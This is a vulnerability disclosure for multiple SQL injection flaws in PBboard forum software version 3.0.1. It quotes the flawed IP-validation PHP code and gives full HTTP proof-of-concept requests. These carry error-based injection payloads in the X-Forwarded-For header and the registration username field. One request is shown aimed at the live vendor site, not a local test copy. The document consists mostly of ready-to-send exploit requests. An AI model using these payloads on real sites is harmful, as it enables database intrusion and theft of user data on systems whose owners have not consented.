PBboard Multiple SQL Injection

Affected version: Version 3.0.1 (updated on 02/09/2015) and before.
============
Link 1
============
Vulnerable function is "ip_adr" (defined in \engine\Engine.class.php)

         function get_IP_address()
    {
       if ($this->_SERVER['HTTP_CLIENT_IP'])
       {
       $IPaddress = $this->ip_adr($this->_SERVER['HTTP_CLIENT_IP']);
       }
       elseif($this->_SERVER['HTTP_X_FORWARDED_FOR'])
       {
       $IPaddress = $this->ip_adr($this->_SERVER['HTTP_X_FORWARDED_FOR']);
       }
       elseif($this->_SERVER['HTTP_X_FORWARDED'])
       {
       $IPaddress = $this->ip_adr($this->_SERVER['HTTP_X_FORWARDED']);
       }
       elseif($this->_SERVER['HTTP_FORWARDED_FOR'])
       {
       $IPaddress = $this->ip_adr($this->_SERVER['HTTP_FORWARDED_FOR']);
       }
       elseif($this->_SERVER['HTTP_FORWARDED'])
       {
       $IPaddress = $this->ip_adr($this->_SERVER['HTTP_FORWARDED']);
       }
       else
       {
       $IPaddress = $this->ip_adr($this->_SERVER['REMOTE_ADDR']);
       }

       return $IPaddress;
    }

    function ip_adr($ip_adr)
    {
         if (preg_match("#^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#",$ip_adr))
         {
         return $ip_adr;
         }
         else
         {
         return 'UNKNOWN';
         }
     }

POC:

GET /pbboard/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
x-forwarded-for: 1.1.1.1' and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) #
Connection: keep-alive


 
============
Link 2
============

POC:

POST /pbboard_v3.0.1/upload/index.php?page=register&start=1 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 267
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/pbboard_v3.0.1/upload/index.php?page=register&index=1&agree=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8


username=poc' and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) %23&password=123456&password_confirm=123456&email=poc%40sec.org&email_confirm=poc%40sec.org&code=23626&month=01&day=02&year=2015&gender=m&invite=cfreer%27&register_button=Complete+registration


**************************************************
FOR EXAMPLE:  http://www.pbboard.info/forums/
**************************************************


HTTP DATA:

POST /forums/index.php?page=register&start=1 HTTP/1.1
Host: www.pbboard.info
Proxy-Connection: keep-alive
Content-Length: 385
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.pbboard.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.pbboard.info/forums/index.php?page=register&index=1&agree=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=91bc2f41ebf9728868aaabbe34ebd3f2; _gat=1; _ga=GA1.2.1886993389.1441175322

username=test11' and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) %23&password=test11&password_confirm=test11&email=test11%40sec.org&email_confirm=test11%40sec.org&code=1d874&month=09&day=18&year=2015&gender=f&invite=cfreer%27&extrafield_2=%D8%BA%D9%8A%D8%B1+%D9%85%D8%AD%D8%AF%D8%AF&register_button=%D8%A5%D9%83%D9%85%D8%A7%D9%84+%D8%A7%D9%84%D8%AA%D8%B3%D8%AC%D9%8A%D9%84
